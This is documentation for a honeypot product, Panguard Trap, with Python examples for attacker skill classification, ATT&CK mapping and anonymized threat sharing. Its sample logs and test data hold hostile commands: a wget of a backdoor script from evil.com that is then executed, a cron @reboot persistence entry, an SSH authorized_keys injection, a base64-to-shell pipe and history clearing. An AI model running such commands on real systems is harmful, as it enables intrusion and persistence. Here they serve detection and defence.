Panguard Trap does not just log connections — it builds behavioral profiles of every attacker that interacts with your honeypots. Each profile includes a skill level classification, intent analysis, and mapping to MITRE ATT&CK techniques.

Skill Level Classification

Trap classifies attackers into three tiers based on observed behavior:

Script Kiddie

Indicator                                           Example
Uses publicly available tools without modification  Running Hydra with default wordlists
Tries only default credentials                      admin/admin, root/password, root/123456
No post-exploitation activity                       Disconnects after successful login
High volume, low sophistication                     Hundreds of login attempts with common passwords

Advanced

Indicator                        Example
Modifies tool parameters         Custom wordlists, adjusted scan timing
Attempts multiple exploit types  Tries SSH, then HTTP, then MySQL
Basic post-exploitation          Runs uname -a, cat /etc/passwd, checks for other hosts
Internal network scanning        Probes RFC 1918 addresses after gaining access

APT (Advanced Persistent Threat)

Indicator                  Example
Custom payloads            Non-standard exploit code, compiled binaries
Low and slow approach      Few connections over extended time periods
Persistence establishment  Installs cron jobs, modifies SSH keys, plants backdoors
Targeted behavior          Searches for specific files, databases, or configurations
Anti-forensics             Clears logs, modifies timestamps

Classification Signals

Three groups of signals feed the tier decision: what credentials were tried, what was run after login, and how the attacker paced the session.

Credentials
  • Default credentials (admin/admin, root/root): Script Kiddie
  • Credential lists (sequential attempts from known wordlists): Script Kiddie to Advanced
  • Targeted credentials (organization-specific usernames, previously breached passwords): Advanced to APT

Commands
  • Single commands (whoami, id, uname -a): Script Kiddie
  • Chained commands (enumeration scripts, privilege escalation attempts): Advanced
  • Custom tooling (obfuscated scripts, memory-resident payloads, anti-detection): APT

Pacing
  • Fast and noisy (rapid connection attempts, no pauses): Script Kiddie
  • Moderate pacing (delays between attempts, some adaptation): Advanced
  • Slow and deliberate (long dwell time, careful enumeration, anti-forensics): APT
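The signal list above is easy to state and fiddly to implement, because one session produces evidence in all three groups at once and the groups can disagree. The following classifier is an added illustration, not Panguard Trap's own code: the three tiers and the credential / command / pacing signals come from this page, while the Session record layout, the keyword lists, the thresholds (2 s median gap, 1 h dwell) and the "strongest signal wins" combination rule are assumptions made for the example. The sessions at the bottom are constructed, not real captures.

```python
"""Skill-tier classification from credential, command and pacing signals.

Added illustration, not Panguard Trap's own classifier. Tiers and signal
groups follow the page; record layout, keyword lists, thresholds and the
strongest-signal-wins rule are assumptions.
"""
from dataclasses import dataclass, field
from statistics import median

TIERS = ("Script Kiddie", "Advanced", "APT")   # index doubles as the tier rank

# Assumed keyword lists; a real deployment tunes these against its own captures.
DEFAULT_CREDS = {("admin", "admin"), ("root", "root"), ("root", "password"),
                 ("root", "123456"), ("ubuntu", "ubuntu")}
OBFUSCATION = ("base64 -d", "base64 --decode", "eval ", "memfd_create", "/dev/shm/", "xxd -r")
ANTI_FORENSICS = ("history -c", "unset HISTFILE", "> /var/log/", "rm -rf /var/log", "touch -r")


@dataclass
class Session:
    src_ip: str
    attempts: list = field(default_factory=list)   # (username, password, epoch_seconds)
    commands: list = field(default_factory=list)   # (command_line, epoch_seconds)
    org_usernames: set = field(default_factory=set)       # assumed: org-specific account names
    breached_passwords: set = field(default_factory=set)  # assumed: passwords from a known breach


def credential_signal(s: Session) -> int:
    pairs = {(u, p) for u, p, _ in s.attempts}
    if not pairs:
        return 0
    if any(u in s.org_usernames or p in s.breached_passwords for u, p in pairs):
        return 2                      # targeted credentials
    if pairs <= DEFAULT_CREDS:
        return 0                      # nothing but defaults
    return 1                          # wordlist-style attempts


def command_signal(s: Session) -> int:
    cmds = [c for c, _ in s.commands]
    if not cmds:
        return 0
    if any(h in c for c in cmds for h in OBFUSCATION):
        return 2                      # custom / memory-resident tooling
    chained = len(cmds) > 1 or any(sep in c for c in cmds for sep in ("&&", ";", "|"))
    privesc = any(c.startswith(("sudo ", "su ")) for c in cmds)
    return 1 if chained or privesc else 0


def pacing_signal(s: Session) -> int:
    events = sorted([t for _, _, t in s.attempts] + [t for _, t in s.commands])
    if len(events) < 2:
        return 0
    gaps = [b - a for a, b in zip(events, events[1:])]
    dwell = events[-1] - events[0]
    anti = any(h in c for c, _ in s.commands for h in ANTI_FORENSICS)
    if anti or (dwell > 3600 and median(gaps) > 60):
        return 2                      # slow and deliberate, or covering tracks
    if median(gaps) >= 2:
        return 1                      # moderate pacing
    return 0                          # fast and noisy


def classify(s: Session) -> dict:
    signals = {"credentials": credential_signal(s),
               "commands": command_signal(s),
               "pacing": pacing_signal(s)}
    rank = max(signals.values())      # strongest signal wins (assumption)
    return {"src_ip": s.src_ip, "level": TIERS[rank],
            "signals": {k: TIERS[v] for k, v in signals.items()}}


def merge_level(existing: str, new: str) -> str:
    """Returning attacker: the stored level only ever moves up, never down."""
    return TIERS[max(TIERS.index(existing), TIERS.index(new))]


# Constructed sessions (documentation IPs, not real captures).
SCRIPT_KIDDIE = Session("203.0.113.50",
    attempts=[(u, p, 1000 + i * 0.2)
              for i, (u, p) in enumerate([("root", "password"), ("admin", "admin"),
                                          ("root", "123456")] * 20)])
ADVANCED = Session("198.51.100.23",
    attempts=[("root", "Summer2024!", 0), ("root", "letmein", 15), ("root", "toor", 31)],
    commands=[("uname -a", 60), ("cat /etc/passwd", 75), ("cat /etc/hosts; ip route", 100)])
APT = Session("192.0.2.77",
    attempts=[("jsmith", "Welcome2024", 0)],
    commands=[("find / -name '*.sql' 2>/dev/null", 600),
              ("echo aGk= | base64 -d | sh", 4000),
              ("history -c", 7300)],
    org_usernames={"jsmith"})

if __name__ == "__main__":
    for s in (SCRIPT_KIDDIE, ADVANCED, APT):
        print(classify(s))
    print(merge_level("Script Kiddie", "Advanced"))
```

Taking the maximum across signal groups means a single strong indicator (one obfuscated payload, one organization-specific username) is enough to raise the tier, which is the conservative choice for a block list feed; the per-signal breakdown is kept in the result so an analyst can see which group drove the decision. merge_level encodes the upgrade-only behaviour described for returning attackers at the end of this page.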

Intent Analysis

Trap analyzes behavioral patterns to classify attacker intent into six categories, each tied to the MITRE ATT&CK tactic it most closely corresponds to:

Intent             Indicators                                                       MITRE Tactic
Reconnaissance     Port scanning, service enumeration, OS fingerprinting            TA0043 (Reconnaissance)
Brute Force        High-volume credential attempts, dictionary attacks              TA0006 (Credential Access)
Exploitation       Known CVE payloads, buffer overflow attempts, injection attacks  TA0001 (Initial Access)
Lateral Movement   Internal network scanning, SMB enumeration, SSH pivoting         TA0008 (Lateral Movement)
Data Exfiltration  File download commands, data encoding, outbound transfers        TA0010 (Exfiltration)
Persistence        Cron job creation, SSH key modification, backdoor installation   TA0003 (Persistence)

MITRE ATT&CK Mapping

Every attacker action is mapped to the relevant MITRE ATT&CK technique or sub-technique (names follow the current ATT&CK naming; T1046 was renamed from Network Service Scanning to Network Service Discovery):

Observed Behavior      Technique ID  Technique Name
SSH password guessing  T1110.001     Brute Force: Password Guessing
Credential stuffing    T1110.004     Brute Force: Credential Stuffing
Web shell upload       T1505.003     Server Software Component: Web Shell
cat /etc/passwd        T1087.001     Account Discovery: Local Account
Internal port scan     T1046         Network Service Discovery
Cron job creation      T1053.003     Scheduled Task/Job: Cron
SSH key modification   T1098.004     Account Manipulation: SSH Authorized Keys
wget/curl download     T1105         Ingress Tool Transfer

Profile Report

View attacker profiles via the CLI:
panguard trap profiles
── Attacker Profiles ──────────────────

Attacker #1: 203.0.113.50
  Level:     Script Kiddie
  Intent:    Brute Force
  Sessions:  47
  Duration:  2h 15m
  Creds:     admin/admin, root/123456 (12 attempts)
  Tools:     hydra 9.4
  MITRE:     T1110.001 (Password Guessing)

Attacker #2: 198.51.100.23
  Level:     Advanced
  Intent:    Reconnaissance -> Exploitation
  Sessions:  3
  Duration:  45m
  Commands:  uname -a, cat /etc/passwd, wget http://...
  Tools:     Custom scripts
  MITRE:     T1046, T1087.001, T1105

Collected Intelligence

Credential Database

All attempted username/password combinations are recorded:
── Captured Credentials ───────────────

SSH:
  root / password       (847 attempts)
  admin / admin         (234 attempts)
  root / 123456         (156 attempts)
  ubuntu / ubuntu       (89 attempts)

Command Logs

Every command executed in a honeypot session is logged with timestamps:
── Command Log ────────────────────────

Session: 203.0.113.50 @ 2025-01-15 14:23
  $ uname -a
  $ cat /etc/passwd
  $ wget http://evil.com/backdoor.sh
  $ chmod +x backdoor.sh
  $ ./backdoor.sh
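The command-driven rows of the MITRE ATT&CK mapping table can be reproduced directly from a command log like the one above. The block below is an added illustration, not Panguard Trap's own mapper: the behaviour-to-technique rows come from this page, while the log parser, the regular expressions and the function names are assumptions, and the sample log is constructed. It deliberately covers only the rows that are visible in a shell command; password guessing, credential stuffing and web shell upload (T1110.001, T1110.004, T1505.003) come from authentication and HTTP events and would need a separate rule set over those records.

```python
"""Map honeypot command-log lines to ATT&CK technique IDs.

Added illustration, not Panguard Trap's own mapper. Rows follow the page's
mapping table; parser, regexes and names are assumptions.
"""
import re

RFC1918 = r"(?:10\.\d{1,3}|172\.(?:1[6-9]|2\d|3[01])|192\.168)\.\d{1,3}\.\d{1,3}"

# Ordered (regex, technique id, technique name); the first matching rule wins per command.
RULES = [
    (re.compile(r"\bcat\s+/etc/passwd\b"), "T1087.001", "Account Discovery: Local Account"),
    # an internal port scan is only counted when the target is an RFC 1918 address
    (re.compile(r"\b(?:nmap|masscan|nc\s+-z)\b.*" + RFC1918), "T1046", "Network Service Discovery"),
    (re.compile(r"\b(?:crontab\s+-|/etc/cron)"), "T1053.003", "Scheduled Task/Job: Cron"),
    (re.compile(r"authorized_keys"), "T1098.004", "Account Manipulation: SSH Authorized Keys"),
    (re.compile(r"\b(?:wget|curl)\b.*https?://"), "T1105", "Ingress Tool Transfer"),
]

LINE_SESSION = re.compile(r"^Session:\s+(\S+)\s+@\s+(.+)$")
LINE_CMD = re.compile(r"^\s*\$\s+(.*)$")


def parse_command_log(text: str) -> list:
    """Parse the CLI 'Command Log' layout into session records (assumed format)."""
    sessions = []
    for line in text.splitlines():
        m = LINE_SESSION.match(line.strip())
        if m:
            sessions.append({"src_ip": m.group(1), "started": m.group(2), "commands": []})
            continue
        m = LINE_CMD.match(line)
        if m and sessions:
            sessions[-1]["commands"].append(m.group(1).strip())
    return sessions


def map_command(cmd: str):
    """Return (technique_id, technique_name) for a command, or None if no rule matches."""
    for rx, tid, name in RULES:
        if rx.search(cmd):
            return (tid, name)
    return None


def map_session(session: dict) -> list:
    """(command, technique_id, technique_name) for every command that maps to a technique."""
    hits = []
    for cmd in session["commands"]:
        m = map_command(cmd)
        if m:
            hits.append((cmd, *m))
    return hits


def technique_ids(session: dict) -> list:
    """Deduplicated technique IDs in first-seen order, like the MITRE line of a profile report."""
    seen = []
    for _, tid, _ in map_session(session):
        if tid not in seen:
            seen.append(tid)
    return seen


# Constructed sample in the CLI layout shown above (documentation addresses, not a real capture).
SAMPLE_LOG = """\
── Command Log ────────────────────────

Session: 198.51.100.23 @ 2025-01-15 14:23
  $ uname -a
  $ cat /etc/passwd
  $ nmap -sS -p 22,445 10.0.0.0/24
  $ wget http://203.0.113.9/backdoor.sh
  $ chmod +x backdoor.sh
  $ (crontab -l; echo '@reboot /tmp/backdoor.sh') | crontab -
  $ echo 'ssh-ed25519 AAAA... attacker' >> ~/.ssh/authorized_keys
"""

if __name__ == "__main__":
    for session in parse_command_log(SAMPLE_LOG):
        print(session["src_ip"], session["started"])
        for cmd, tid, name in map_session(session):
            print(f"  {tid:<10} {name:<45} <- {cmd}")
        print("  MITRE:", ", ".join(technique_ids(session)))
```

Commands with no rule (uname -a, chmod) are simply not emitted rather than forced into a technique; a reconnaissance command that has no ATT&CK sub-technique of its own is better left unmapped than mapped wrongly, since these IDs feed the shared profile. The RFC 1918 check on the scan rule is what separates "internal port scan" from a scan of arbitrary Internet space.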

Intelligence Flow

Honeypot Session
      |
      v
Behavioral Analysis ──> Skill Classification
      |                        |
      v                        v
Intent Classification    MITRE Mapping
      |                        |
      v                        v
Guard Block List    Threat Cloud Upload

Threat Cloud Integration

Attacker profiles are anonymized before sharing:
Data Shared           Anonymization
Source IP             /16 masked (last two octets zeroed)
Credentials           Hashed (SHA-256), never plaintext
Commands              Sanitized of environment-specific data
Skill classification  Shared as-is
Intent analysis       Shared as-is
Attacker profiles persist across sessions. If the same IP returns days later, Trap correlates the new activity with the existing profile and may upgrade the skill level classification based on new evidence.

Threat Cloud sharing can be disabled with --no-cloud for air-gapped environments.
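The anonymization table above is short enough to verify by hand on an outbound record before enabling sharing. The block below is an added illustration, not Panguard Trap's own upload code: the three rules (/16 masking of the source IP, SHA-256 of credentials, sanitization of commands) are from the table, while the function names, the username:password hashing layout and the concrete sanitization patterns (RFC 1918 addresses, home directory paths, the sensor hostname) are assumptions. One caveat a reviewer should keep in mind: an unsalted SHA-256 of a low-entropy credential pair is trivially matched by anyone holding the same wordlist, so the hash hides the value from casual reading and allows identical credentials to be correlated across sensors, but it is not secrecy for weak passwords.

```python
"""Apply the Threat Cloud anonymization rules to an attacker profile.

Added illustration, not Panguard Trap's own code. Rules follow the page's
table; names, hash layout and sanitization patterns are assumptions.
"""
import hashlib
import ipaddress
import re

RFC1918 = re.compile(r"\b(?:10\.\d{1,3}|172\.(?:1[6-9]|2\d|3[01])|192\.168)\.\d{1,3}\.\d{1,3}\b")
HOMEDIR = re.compile(r"/home/[A-Za-z0-9_.-]+")


def mask_ip_16(ip: str) -> str:
    """Zero the last two octets: 203.0.113.50 -> 203.0.0.0 (IPv4 only, per the table)."""
    addr = ipaddress.ip_address(ip)
    if addr.version != 4:
        raise ValueError("the page documents /16 masking for IPv4 addresses only")  # assumption
    return str(ipaddress.ip_network(f"{ip}/16", strict=False).network_address)


def hash_credential(username: str, password: str) -> str:
    """SHA-256 over 'username:password' (assumed layout; keeps the pair correlatable, not secret)."""
    return hashlib.sha256(f"{username}:{password}".encode()).hexdigest()


def sanitize_command(cmd: str, hostname: str = "") -> str:
    """Strip environment-specific data: internal IPs, home directories, the sensor's hostname."""
    out = RFC1918.sub("<internal-ip>", cmd)
    out = HOMEDIR.sub("/home/<user>", out)
    if hostname:
        out = out.replace(hostname, "<hostname>")
    return out


def anonymize_profile(profile: dict, hostname: str = "") -> dict:
    """Build the record that would be uploaded; classification fields pass through unchanged."""
    return {
        "source": mask_ip_16(profile["source"]),
        "credentials": sorted({hash_credential(u, p) for u, p in profile["credentials"]}),
        "commands": [sanitize_command(c, hostname) for c in profile["commands"]],
        "level": profile["level"],
        "intent": profile["intent"],
    }


def leaks_plaintext(profile: dict, anonymized: dict) -> bool:
    """Pre-upload check: does any original password string survive in the outbound record?"""
    blob = str(anonymized)
    return any(p in blob for _, p in profile["credentials"])


# Constructed profile (documentation addresses, not a real capture).
PROFILE = {
    "source": "203.0.113.50",
    "credentials": [("admin", "admin"), ("root", "password"), ("root", "123456")],
    "commands": ["nmap -sS 10.0.0.0/24 && cat /home/alice/.bash_history",
                 "ssh alice@hp-sensor-01 'id'"],
    "level": "Script Kiddie",
    "intent": "Brute Force",
}

if __name__ == "__main__":
    out = anonymize_profile(PROFILE, hostname="hp-sensor-01")
    for k, v in out.items():
        print(f"{k:<12} {v}")
    print("plaintext leak:", leaks_plaintext(PROFILE, out))
```

leaks_plaintext is the kind of guard worth running in front of any upload path: it is cheap, it catches a sanitizer that silently stopped matching, and it fails closed on the one field where a mistake would be irreversible.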